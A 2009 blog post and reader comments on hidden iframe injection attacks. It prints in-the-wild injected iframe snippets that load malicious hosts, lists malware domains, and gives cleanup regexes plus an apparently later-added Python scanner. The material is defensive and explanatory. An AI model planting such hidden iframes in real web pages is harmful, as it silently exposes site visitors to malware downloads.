Hidden iframe injection attacks

Mar 20 2009

[Updated on October 27, 2009 with a new version of the script]

It is a shame that after all those posts about security, some of my websites were under attack today.

Shoban and Anand emailed me about this today morning (Thanks guys) and I tried to understand what was going on. To my utter disbelief more than 10 websites hosted in the same server were affected by the attack.

All the index.* files in the server were infected with a piece of code that loaded a hidden iframe in the page.

To the html pages the following piece of code was added:

<iframe src="http://goooogleadsence.biz/?click=8F9DA" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

To php pages it added:

echo "<iframe src=\"http://goooogleadsence.biz/?click=8F9DA\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

Asha took the effort and cleaned most of the infected files. We are monitoring the status now.

How did the worm inject the hidden iframes to my files?

There are two ways through which the worm is believed to infect your files:

1) Server is compromised

This is the most common way. Some of the websites residing on the same web server as your website may be compromised (or it may be some vulnerability in your web application itself) that caused the web server to be compromised. Once the server is compromised, the worm will spread to all the websites on the server.

2) Client side FTP

The worm resides on one or more of the client-side PCs you use for accessing the ftp/control panel accounts of your hosting server.

When you type in the username and password for the ftp/control panel account, the worm silently reads the credentials, accesses your ftp account and infects the files in the server. It adds the above mentioned code to all index.* files.

How can I recover from a hidden iframe injection attack?

Here are a few tips that might help you:

  1. The first thing to do to prevent these kinds of attacks is to change your ftp, control panel and database passwords as soon as possible.
  2. Notify your web host about the attack and advise them to take measures against a possible server-wide attack.
  3. Change the file permissions on your server to the most secure mode.
  4. Download all your files from the server and check for infections. Clean the infected files.
  5. Using good antivirus software, scan and clean every PC you use for logging into your hosting server.
  6. Never use public computers to access your server.

How do I clean infected files?

Use these regular expressions to search for all pages containing the malicious code and replace it with a space:

<iframe src=\"http://[^"]*\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>

echo \"<iframe src=\\\"http://[^"]*\\\" width=1 height=1 style=\\\"visibility:hidden;position:absolute\\\"></iframe>\";

You may have to write a script to automate this for all the files in the server.

I have cooked up a php script that can help you find out the infected files. Download the file from here, save it as clean.php (it is currently clean.php.txt) and upload it to the root folder of your website.

You may want to change some hardcoded values inside the file.

Then visit the url:

http://www.yourdomain.com/clean.php?c=iframe

The parameter c specifies the text to search for inside the file. The results will be something like:

[Screenshot: Clean hidden iframes]

It will search all the files in your website and, if any of the files contains the given string, it will print the filename along with the number of occurrences of the string. In the above screenshot, you can see that one file is infected.

Note that the script will not remove the iframes from your files. Automated cleaning could break some of your websites. So as of now you will have to clean the files manually.
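The regular expressions above and the clean.php scanner do two separate jobs: find every file carrying the hidden iframe, and report how many times it occurs. The following Python script is an added example, not the post's clean.php or Faiz's ASP.Net script, and it is meant to run on a local copy of the site after you have downloaded all your files (step 4 above) rather than on the web server. It generalizes the two regexes into one pattern that matches the raw HTML form, the PHP `echo` form with backslash-escaped quotes, and the variant without a closing `</iframe>` tag, reports per-file counts the way clean.php does, and offers a separate strip function whose result you inspect before writing anything back. The sample site it scans is constructed inline; the host list is taken from the indicators quoted on this page.

```python
import tempfile
from pathlib import Path
from urllib.parse import urlsplit
import re

# A double quote preceded by zero to three backslashes, so the same pattern
# matches <iframe src="..."> in HTML, src=\"...\" inside a PHP echo "..." string,
# and the doubly escaped form used in the page's second search regex.
Q = r'\\{0,3}"'

HIDDEN_IFRAME_RE = re.compile(
    r'(?:echo\s+' + Q + r')?'                    # optional PHP echo prefix
    r'<iframe\s+src=' + Q + r'(https?://[^"\\]*)' + Q +  # group 1: the injected URL
    r'\s+width=1\s+height=1\s+style=' + Q +
    r'visibility:hidden;position:absolute' + Q +
    r'\s*>\s*(?:</iframe>)?'                     # closing tag is missing in one wild sample
    r'(?:' + Q + r';)?',                         # optional end of the PHP echo statement
    re.IGNORECASE,
)

# Hosts quoted on this page as serving the iframe payloads (subset, for illustration).
KNOWN_BAD_HOSTS = {"goooogleadsence.biz", "hostverify.net", "hosttracker.net",
                   "gumblar.cn", "martuz.cn", "beladen.net"}


def find_hidden_iframes(text):
    """Return the src URL of every hidden 1x1 iframe injected into `text`."""
    return [m.group(1) for m in HIDDEN_IFRAME_RE.finditer(text)]


def flag_known_hosts(urls):
    """Which of the extracted URLs point at a host already known to be malicious."""
    return sorted({urlsplit(u).hostname for u in urls if urlsplit(u).hostname in KNOWN_BAD_HOSTS})


def scan_tree(root):
    """Walk `root` and return {relative path: occurrence count} for every infected file,
    mirroring what clean.php prints (filename plus number of occurrences)."""
    hits = {}
    for path in Path(root).rglob("*"):
        if not path.is_file():
            continue
        try:
            text = path.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue  # unreadable file: skip rather than abort the whole scan
        count = len(find_hidden_iframes(text))
        if count:
            hits[path.relative_to(root).as_posix()] = count
    return hits


def strip_hidden_iframes(text):
    """Remove every match and return (cleaned_text, removed_count).
    Deliberately does not write to disk: review the result before replacing a file."""
    return HIDDEN_IFRAME_RE.subn("", text)


def demo():
    """Constructed sample site: an infected index.html, an index.php injected twice, one clean page."""
    injected_html = ('<iframe src="http://goooogleadsence.biz/?click=8F9DA" width=1 height=1 '
                     'style="visibility:hidden;position:absolute"></iframe>')
    injected_php = ('echo "<iframe src=\\"http://hostverify.net/?click=2730375\\" width=1 height=1 '
                    'style=\\"visibility:hidden;position:absolute\\"></iframe>";')
    with tempfile.TemporaryDirectory() as root:
        Path(root, "index.html").write_text("<html><body>hi</body></html>\n" + injected_html + "\n")
        Path(root, "blog").mkdir()
        Path(root, "blog", "index.php").write_text("<?php\n" + injected_php + "\n" + injected_php + "\n")
        Path(root, "about.html").write_text("<html><body>clean</body></html>\n")
        hits = scan_tree(root)
        cleaned, removed = strip_hidden_iframes(Path(root, "blog", "index.php").read_text())
    return hits, removed, cleaned


if __name__ == "__main__":
    hits, removed, cleaned = demo()
    for name, count in sorted(hits.items()):
        print(f"{name}: {count} occurrence(s)")
    print(f"dry-run strip of blog/index.php removed {removed} iframe(s)")
```

Running it lists `blog/index.php: 2` and `index.html: 1`, while about.html is not reported. The `[^"\\]*` in the URL group stops at a backslash so the escaped closing quote of the PHP form is not swallowed into the URL, and `flag_known_hosts` lets you confirm a hit against the host list near the end of this post before deciding whether a match is the real thing or a legitimate 1x1 iframe of your own.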

Faiz has written an advanced ASP.Net script for finding the infected files, and it can be found here.

Will my search engine rankings be affected by this attack?

Try to be fast with these steps, because if a visitor sees the message “This site may harm your computer” pop up when (s)he tries to access your website/blog, (s)he may not return again. Remember that if the security of your website is compromised, it can affect the search engine rankings of the website. Besides, it may pave the way for more sophisticated attacks.

Google will mark your site in its search results with a warning: “This site may harm your computer”.

Use the following link to see what Google thinks about your website (give the URL of your site instead of shopfloorbd.co.uk):

http://www.google.com/safebrowsing/diagnostic?site=http://shopfloorbd.co.uk

As mentioned above, you must remove the malware from your local machine using antivirus software. AVG sees it as “Trojan Horse Downloader” and NOD32 sees it as “JS/Kryptik.B trojan”.

Note that when visiting an infected site, some antivirus programs warn you that an exe file, “Trojan Horse Downloader”, is trying to load. Once the exe infects your machine, it will infect your server too.

Here are some more code samples caught from the wild:

<iframe src="http://hostverify.net/?click=2730375" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

<iframe src="http://hosttracker.net/?click=32431937" width=1 height=1 style="visibility:hidden;position:absolute">

There are obfuscated versions of the attack code too:

<script>function c102916999516l4956a7e7c979e(l4956a7e7c9b86){…  etc.

Here is a list of some other websites that host malicious content:

gumblar.cn

martuz.cn

beladen.net

38zu.cn

googleanalytlcs.net

lousecn.cn

fqwerz.cn

d99q.cn

orgsite.info

94.247.2.0

94.247.2.195

http://mmsreader.com

http://google-ana1yticz.com

http://my2.mobilesect.info

http://thedeadpit.com

http://internetcountercheck.com

http://165.194.30.123

http://ruoo.info

gogo2me.net/

http://live-counter.net

http://klinoneshoes.info

protection-livescan.com/

http://webexperience13.com

http://q5x.ru

If you find these URLs in any code on your website, that is a sure sign that you are infected.


  • Silky says:

    Is that the real URL? If so maybe consider adjusting it slightly so no-one accidentally goes to it and gets infected.

  • Niyaz PK says:

    Let it be.

    Some people are coming to this page from the search term “goooogleadsence.biz”. I hope this article will help them.

    Anyway I have not provided any clickable links. So I think there is no harm. If you copy and paste the url to the address bar, you better know what you are doing.

  • Charles says:

    Hey,

    This totally happened to me and we are investigating the cause because it is a serious liability issue to us right now. Who is your hosting provider? Is it RackSpace?

    Thanks,
    Charles

  • Anon says:

    We had this problem happen to us on the mosso rackspace servers…

  • Shoban says:

    @Anon @Charles .. Don't tell me that you are having these issues with Rackspace servers? ;-)

    I thought they are good compared to Cable and Wireless…. We have moved our company sites from C&W to Rackspace.

  • Niyaz PK says:

    I don’t think the issue is with any specific hosting provider (unless they screwed up their passwords).

    This worm infects the files if it somehow managed to sniff your ftp/cpanel password. The best way to prevent the attack is to change your passwords frequently. Never login to your server ftp/cpanel accounts from public computers (or virus infected computers).

  • pn says:

    Did you ever get any answers from Mosso? Did they own up to this? We are having the same issue, changed passwords, reuploaded files to see what would happen and bam…string included again.

    Nothing running on our site, just hosting files.

  • Niyaz PK says:

    “changed passwords, reuploaded files to see what would happen and bam…string included again”

    This is a sure shot indication that the machine that you are using to access the server is infected by spyware/malware.

  • Nazieb says:

    So this is a new case, eh?

    Thanks for the information. It’s really helpful..

  • TheAnand says:

    I usually use password banks for my logins….

    you might want to update the original post with how this worm operates for those coming thru searches.

  • DanG says:

    Having the same problem with a lot of sites under our account with Dreamhost. I told them about the problem and it doesn’t appear they give too much of a damn.

    Furthermore, there was a second attack where code pointing to a site hosted on the Dreamhost servers was the recipient of the iframe traffic. Can you believe that they asked me to contact the website owner myself and “discuss” it with him. Yea, coz he must be sooo upset about the extra 5-10K visits per day he’s getting!

    Wankers

  • DanG says:

    Spoke too soon – a rep contacted me and it looks like they’re gonna help out as much as they can.

  • Dave says:

    Hi,

    This virus is not related to the host, but its related to client side malware.

    This can be detected through Avast (try free version and it works well). This malware gets the ftp details from the session, connects the site you last connected through ftp, downloads index.* (index.html, index.htm, index.php, index.aspx etc), inserts the iframe code and finally uploads back to the server.

    This malware can be detected by Avast and your system will be free from that, but it doesn't cure the files on the server.

    To cure files on the server, I have been trying to write a script for the past few days and it seems it's going to work fine; I'm just fine-tuning the script as of now and will be releasing it soon.

    The script is written as a PHP file, so if you have PHP support on your server, this script is going to fix your problems.

    Regards,

    Dave.

  • Niyaz PK says:

    Dave,

    Let us know when the script is ready.

  • Pippo says:

    Hi,

    We’ve got the same problem. It seems that one of our dev team has that malware on their clients. They will clean it up tomorrow.

    I have found this http://www.yourjoomlapro.com/ . Anyone bought that script? Seems to be from Dave who posted already something here (?).

    Regards

    Pippo

  • OK guys same problem bloody asshole spyware, see for yourself
    counterstrike.co.nz :(
    Someone please help me :( )

  • Raj Talreja says:

    Guys, this is not a host issue; what I believe is it's a client-side worm.

    I faced same problem with some of my old clients even very new client who just came for this ISSUE only

    we found same iframes and today I just found this goooogleadsence code in iframe in one of my client’s website.

    I myself cleaned many websites but it just comes in a very short time again..

    I cleaned my machine, it's not infected, but I found my office machines are infected with some worms; Avast and NOD32 find this well.

    If you have NOD32 or Avast you won't be able to open the website; this antivirus will block the website and warn you about the threat.

    Etrust doesn't block the website, it just lets you go and open it, but doesn't download the worm onto your machine I guess…

    Well, there isn't much of a solution available yet, as there are so many web owners / developers facing the same issue.

    my recent sites attacked are http://www.waytogrowrich.com and http://www.webtail.de :(

    attack again and again…

  • Dave says:

    Hi,

    Have got the fix script ready, check at http://www.yourjoomlapro.com
